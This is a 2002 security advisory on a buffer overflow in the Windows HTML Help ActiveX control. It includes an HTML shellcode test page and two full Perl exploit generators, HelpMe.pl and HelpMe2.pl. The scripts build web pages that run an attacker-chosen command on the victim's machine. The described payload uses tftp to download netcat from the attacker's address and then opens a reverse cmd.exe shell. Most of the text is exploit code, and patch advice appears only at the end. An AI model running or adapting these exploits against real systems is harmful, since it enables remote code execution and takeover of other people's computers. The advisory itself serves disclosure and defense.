Multiple vulnerabilities in the Microsoft Windows HTML Help ActiveX control

Published: 2002-05-31
Updated: 2002-08-02
Severity: medium
Threat level: normal user access rights
Error type: boundary check error
Exploitation: client-side
BUGTRAQ ID: 4857

Affected systems
Microsoft Windows 2000 Advanced Server SP2

Detailed description
The HTML Help ActiveX control (Hhctrl.ocx) is part of the Microsoft HTML Help system and is designed to provide help functionality together with Internet Explorer.

The HTML Help ActiveX control (Hhctrl.ocx) is subject to a buffer overflow. Its WinHelp command does not correctly check the bounds of one of its parameter items (item); this item specifies the storage path of the WinHelp (.hlp) file for a WinHelp topic. If an attacker crafts a page in which the value of this item is overly long, a buffer overflow occurs when another user processes the page, and execution of arbitrary code may be possible.

No further details are currently available.

Test code
<OBJECT classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11 codeBase=hhctrl.ocx#Version=4,72,8252,0 height=0 id=winhelp type=application/x-oleobject width=0><PARAM NAME="Width" VALUE="26"><PARAM NAME="Height" VALUE="26"><PARAM NAME="Command" VALUE="WinHelp"><PARAM NAME="Item1" VALUE="^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð3ÀPhcalc^Í4$ƒÀPV¸¯§éw^?Ð3ÀP¾”^Ïéw^?ÖAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOP PPPQQQQRRRRSSSSTTTAAAA©õwABCDEFGH^ЃÆ^?ægMyWindow"><PARAM NAME="Item2" VALUE="NGS Software LTD"></OBJECT>
<SCRIPT>winhelp.HHClick()</SCRIPT>

==========================================================
Winhlp32.exe Buffer Overflow Exploit Code
------------------------------------------------------------------------

SUMMARY

Attached is proof of concept code / exploit code for the winhlp32 buffer overflow vulnerability. The shell code is relatively small but effective if used correctly. The perl script takes a command to execute (WinExec, SW_HIDE) and a html output file.

There are two versions included with this advisory:
* HelpMe.pl that was written to work with kernel32.dll version 5.0.2195.4272
* HelpMe2.pl that was written to work with all other machines, kernel32.dll version 5.0.2195.2778

DETAILS

Exploit:
The exploit does the following:
1) Executes tftp.exe -i my.ip.address get nc.exe c:\winnt\system32\nc.exe
2) Executes nc.exe my.ip.address 80 -e cmd.exe

If the exploit executes correctly exitprocess() will report no error.
HelpMe2.pl:

# Winhlp32.exe Remote Buffer Overrun exploit code.
# written by Gary O'leary-Steele Sec-1 Ltd. Garyo@sec-1.com
# For use as proof of concept
### Amended for use with kernel32.dll version 5.0.2195.2778
####### Kernell32 jmp ebx 77E87793

$sploit = "\x55\x8b\xec\x8b\xc3".          # Fixed from previous version
          "\xbe\xff\xff\xff\xff".
          "\x81\xEE\x85\x85\x85\x85".
          "\x83\xc0\x01".
          "\x8b\x10".
          "\x3b\xd6".
          "\x75\xf7".
          "\x8b\xd8".
          "\x83\xc3\x01".
          "\x80\x6b\x03\x41".
          "\x8b\x7b\x04".
          "\x81\xff\x58\x58\x58\x58".
          "\x75\xEE".
          "\x81\x6b\x04\x58\x58\x58\x58".
          "\x33\xf6".
          "\x56".
          "\x83\xc0\x04".
          "\x50".
          "\xbb\xaf\xa7\xe9\x77".          # mov ebx, 0x77e9a7af winexec() address
          "\xff\xd3";                      # call ebx

$exitproc = "\xBB\x95\x8f\xe9\x77".
            "\x83\xeb\x01".
            "\xff\xd3";                    # 77e98f94 + 1 for exit proc

$RET  = "\x24\xF1\x5d\x01";
#$EIP2 = "\x93\x77\xe8\x77";              # This works on kernel32.dll version 5.0.2195.4272
$EIP2 = "\xDE\x16\xe8\x77";               # 77E816DE
# direct jump = 0006FBD4
##$EIP2 = "\xd4\xfb\x06\x00";

print "Exploit code for Winhlp32.exe Remote BufferOverrun.\nBy Gary Oleary-Steele Sec-1 Ltd\nCalls WinExec SW_HIDE and executes supplied command\nTested on windows 2000 professional SP2\n\n";
print "Enter Command to execute: ";
$command = <STDIN>;
print "Enter Output File: ";
$outputfile = <STDIN>;
chomp $command;
chomp $outputfile;

open(INFILE, ">$outputfile");

$command = encode($command);
$nn      = 123 - length($command);
$nops    = "\x90" x $nn;
# the missing concatenation operator between $RET and $EIP2 in the
# distributed copy has been restored here
$exploit = $sploit . "zzzz" . $command . 'XXXX' . $nops . $exitproc . $RET . $EIP2;

$f1 = <<"file1";
<OBJECT classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11 codeBase=hhctrl.ocx#Version=4,72,8252,0 height=0 id=winhelp type=application/x-oleobject width=0><PARAM NAME="Width" VALUE="26"><PARAM NAME="Height" VALUE="26"><PARAM NAME="Command" VALUE="WinHelp"><PARAM NAME="Item1" VALUE='
file1
chomp $f1;

$f2 = <<"file2";
'><PARAM NAME="Item2" VALUE="Sec-1 LTD"></OBJECT><SCRIPT>winhelp.HHClick()</SCRIPT>
file2

print INFILE $f1 . $exploit . $f2;

# adds 65 to every byte of the command; the shellcode subtracts it again at run time
sub encode {
    my ($command) = @_;
    my $newchar = '';
    my $lofcmd  = length($command);
    for (my $i = 0; $i < $lofcmd; $i++) {
        my $chartoconvert = substr($command, $i, 1);   # pull out each character
        $chartoconvert = ord($chartoconvert);          # convert to a dec
        for ($b = 0; $b < 65; $b++) {
            $chartoconvert++;
        }
        my $tmpchr = chr($chartoconvert);              # convert back to chr
        $newchar = $newchar . $tmpchr;
    }
    print $newchar;
    return $newchar;
}

HelpMe.pl:

# Winhlp32.exe Remote BufferOverrun exploit code.
# written by Gary O'leary-Steele Sec-1 Ltd. Garyo@sec-1.com
# For use as proof of concept
# Kernel32.dll version 5.0.2195.4272
####### Kernell32 jmp ebx 77E87793

$sploit = "\x55\x8b\xec\x8b\xc3".          # xc5 is ebp change if error
          "\xbe\xff\xff\xff\xff".
          "\x81\xEE\x85\x85\x85\x85".
          "\x83\xc0\x01".
          "\x8b\x10".
          "\x3b\xd6".
          "\x75\xf7".
          "\x8b\xd8".
          "\x83\xc3\x01".
          "\x80\x6b\x03\x41".
          "\x8b\x7b\x04".
          "\x81\xff\x58\x58\x58\x58".
          "\x75\xEE".
          "\x81\x6b\x04\x58\x58\x58\x58".
          "\x33\xf6".
          "\x56".
          "\x83\xc0\x04".
          "\x50".
          "\xbb\x94\xee\xe8\x77".          # mov ebx, 0x77e8ee94 winexec() address
          "\xff\xd3";                      # call ebx

$exitproc = "\xBB\x5d\xa9\xe8\x77".
            "\x83\xeb\x01".
            "\xff\xd3";

$RET  = "\x24\xF1\x5d\x01";
$EIP2 = "\x93\x77\xe8\x77";               # This works
#$EIP2 = "\xf6\xbf\x30\x78";
# direct jump = 0006FBD4
##$EIP2 = "\xd4\xfb\x06\x00";

print "Exploit code for Winhlp32.exe Remote BufferOverrun.\nBy Gary Oleary-Steele Sec-1 Ltd\nCalls WinExec SW_HIDE and executes supplied command\nTested on windows 2000 professional SP2\n\n";
print "Enter Command to execute: ";
$command = <STDIN>;
print "Enter Output File: ";
$outputfile = <STDIN>;
chomp $command;
chomp $outputfile;

open(INFILE, ">$outputfile");

$command = encode($command);
$nn      = 123 - length($command);
$nops    = "\x90" x $nn;
# the missing concatenation operator between $RET and $EIP2 in the
# distributed copy has been restored here
$exploit = $sploit . "zzzz" . $command . 'XXXX' . $nops . $exitproc . $RET . $EIP2;

$f1 = <<"file1";
<OBJECT classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11 codeBase=hhctrl.ocx#Version=4,72,8252,0 height=0 id=winhelp type=application/x-oleobject width=0><PARAM NAME="Width" VALUE="26"><PARAM NAME="Height" VALUE="26"><PARAM NAME="Command" VALUE="WinHelp"><PARAM NAME="Item1" VALUE='
file1
chomp $f1;

$f2 = <<"file2";
'><PARAM NAME="Item2" VALUE="Sec-1 LTD"></OBJECT> <SCRIPT>winhelp.HHClick()</SCRIPT>
file2

print INFILE $f1 . $exploit . $f2;

# adds 65 to every byte of the command; the shellcode subtracts it again at run time
sub encode {
    my ($command) = @_;
    my $newchar = '';
    my $lofcmd  = length($command);
    for (my $i = 0; $i < $lofcmd; $i++) {
        my $chartoconvert = substr($command, $i, 1);   # pull out each character
        $chartoconvert = ord($chartoconvert);          # convert to a dec
        for ($b = 0; $b < 65; $b++) {
            $chartoconvert++;
        }
        my $tmpchr = chr($chartoconvert);              # convert back to chr
        $newchar = $newchar . $tmpchr;
    }
    print $newchar;
    return $newchar;
}

ADDITIONAL INFORMATION

The information has been provided by <mailto:garyo@sec-1.com> Gary O'leary-Steele.
=======================================
Solution
Please download and install SP3:

Microsoft Windows 2000 Advanced Server SP2:
  Microsoft Upgrade Windows 2000 SP3
  http://www.microsoft.com/windows2000/downloads/servicepacks/sp3/sp3lang.asp

Microsoft Windows 2000 Datacenter Server SP2:

Microsoft Windows 2000 Professional SP2:
  Microsoft Upgrade Windows 2000 SP3
  http://www.microsoft.com/windows2000/downloads/servicepacks/sp3/sp3lang.asp

Microsoft Windows 2000 Server SP2:
  Microsoft Upgrade Windows 2000 SP3
  http://www.microsoft.com/windows2000/downloads/servicepacks/sp3/sp3lang.asp

Related information
Next Generation Security Software.
Reference: http://www.nextgenss.com/vna/ms-whelp.txt